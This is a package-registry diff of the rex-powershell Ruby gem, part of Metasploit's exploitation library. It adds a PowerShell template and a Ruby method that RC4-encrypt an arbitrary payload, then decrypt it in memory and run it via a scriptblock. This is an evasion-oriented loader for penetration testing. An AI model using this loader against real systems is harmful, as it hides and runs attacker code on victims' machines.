rex-powershell 0.1.86 → 0.1.87

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (9) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +0 -0
  4. data/data/templates/to_mem_rc4.ps1.template +40 -0
  5. data/lib/rex/powershell/payload.rb +22 -0
  6. data/lib/rex/powershell/version.rb +1 -1
  7. data/rex-powershell.gemspec +1 -0
  8. metadata +17 -2
  9. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 2d26075990237181aafd00190e76bac14acdee1393e77231d0f1f24f3122dc36
4
- data.tar.gz: d3b8f606d7b8cfc376d4ea7e71461008336d0aa9ffcbab1ed70f1ff9bf41c5fa
3
+ metadata.gz: 764fea22dc597fbfbf2af172ae81f6dccebf23d280d94683cd3220987565e567
4
+ data.tar.gz: df359a4703480f97a0353d840283099960fca5db2679cc67a812ffe0d7a8770b
5
5
  SHA512:
6
- metadata.gz: 1c0f6e5aada793a549fb022bead14e6e1996f17ef786d796bbe194daca9d65db78842e56036b0dcf7d938505f71860f1408603103b96199fa3c924443bfb44a6
7
- data.tar.gz: d16cc849d1fb7121e86a9bf267a07bd2dc717fc448ae8797f939c4461a08a857694aa5a3e5ebda5d6c7ca4fe2c17af678d7ceea15cf92a4b7118f50131c8895a
6
+ metadata.gz: e491690da3d3fc1d0c4be168b6029d612da06b5012d05f4f7ad9aea85aaa088d154ce37f499244b765072e60067c87a13b25c3d356e8313092602ca4416a5e06
7
+ data.tar.gz: e8b2607028adf09d185abf0c0833240c3232198c78f9ff928b0c8936ec4592c7c88a988c96bdaf8dac26da33ff1e6d510297283bf276e2bc2bdb0fb0af489a67
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
Binary file
data/data/templates/to_mem_rc4.ps1.template ADDED
@@ -0,0 +1,40 @@
1
+ function %{func_rc4_decrypt} {
2
+ param([Byte[]]$%{var_rc4buffer})
3
+
4
+ $%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
5
+
6
+ $s = New-Object Byte[] 256;
7
+ $k = New-Object Byte[] 256;
8
+
9
+ for ($i = 0; $i -lt 256; $i++)
10
+ {
11
+ $s[$i] = [Byte]$i;
12
+ $k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
13
+ }
14
+
15
+ $j = 0;
16
+ for ($i = 0; $i -lt 256; $i++)
17
+ {
18
+ $j = ($j + $s[$i] + $k[$i]) %% 256;
19
+ $temp = $s[$i];
20
+ $s[$i] = $s[$j];
21
+ $s[$j] = $temp;
22
+ }
23
+
24
+ $i = $j = 0;
25
+ for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
26
+ {
27
+ $i = ($i + 1) %% 256;
28
+ $j = ($j + $s[$i]) %% 256;
29
+ $temp = $s[$i];
30
+ $s[$i] = $s[$j];
31
+ $s[$j] = $temp;
32
+ [int]$t = ($s[$i] + $s[$j]) %% 256;
33
+ $%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
34
+ }
35
+
36
+ $%{var_rc4buffer}
37
+ }
38
+
39
+ &([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
40
+
data/lib/rex/powershell/payload.rb CHANGED
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
  require 'rex/random_identifier'
3
+ require 'rc4'
3
4
 
4
5
  module Rex
5
6
  module Powershell
@@ -106,6 +107,27 @@ module Payload
106
107
  read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
107
108
  end
108
109
 
110
+ #
111
+ # PSH script that executes an RC4 encrypted payload with Invoke-Expression
112
+ # by Adrian Vollmer (SySS GmbH, https://www.syss.de)
113
+ #
114
+ def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
115
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
116
+ rig.init_var(:func_rc4_decrypt)
117
+ rig.init_var(:var_rc4buffer)
118
+ rig.init_var(:var_key)
119
+
120
+ key = Rex::Text.rand_text_alpha(rand(8)+8)
121
+ rc4 = RC4.new(key)
122
+ enc_code = rc4.encrypt(code)
123
+
124
+ hash_sub = rig.to_h
125
+ hash_sub[:random_key] = key
126
+ hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
127
+
128
+ read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
129
+ end
130
+
109
131
  end
110
132
  end
111
133
  end
data/lib/rex/powershell/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.86"
3
+ VERSION = "0.1.87"
4
4
  end
5
5
  end
data/rex-powershell.gemspec CHANGED
@@ -26,4 +26,5 @@ Gem::Specification.new do |spec|
26
26
 
27
27
  spec.add_runtime_dependency 'rex-text'
28
28
  spec.add_runtime_dependency 'rex-random_identifier'
29
+ spec.add_runtime_dependency 'ruby-rc4'
29
30
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.86
4
+ version: 0.1.87
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -93,7 +93,7 @@ cert_chain:
93
93
  JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
94
94
  DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
95
95
  -----END CERTIFICATE-----
96
- date: 2020-02-17 00:00:00.000000000 Z
96
+ date: 2020-02-21 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: bundler
@@ -165,6 +165,20 @@ dependencies:
165
165
  - - ">="
166
166
  - !ruby/object:Gem::Version
167
167
  version: '0'
168
+ - !ruby/object:Gem::Dependency
169
+ name: ruby-rc4
170
+ requirement: !ruby/object:Gem::Requirement
171
+ requirements:
172
+ - - ">="
173
+ - !ruby/object:Gem::Version
174
+ version: '0'
175
+ type: :runtime
176
+ prerelease: false
177
+ version_requirements: !ruby/object:Gem::Requirement
178
+ requirements:
179
+ - - ">="
180
+ - !ruby/object:Gem::Version
181
+ version: '0'
168
182
  description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
169
183
  scripts
170
184
  email:
@@ -185,6 +199,7 @@ files:
185
199
  - data/templates/to_mem_msil.ps1.template
186
200
  - data/templates/to_mem_old.ps1.template
187
201
  - data/templates/to_mem_pshreflection.ps1.template
202
+ - data/templates/to_mem_rc4.ps1.template
188
203
  - lib/rex/powershell.rb
189
204
  - lib/rex/powershell/command.rb
190
205
  - lib/rex/powershell/function.rb
metadata.gz.sig CHANGED
Binary file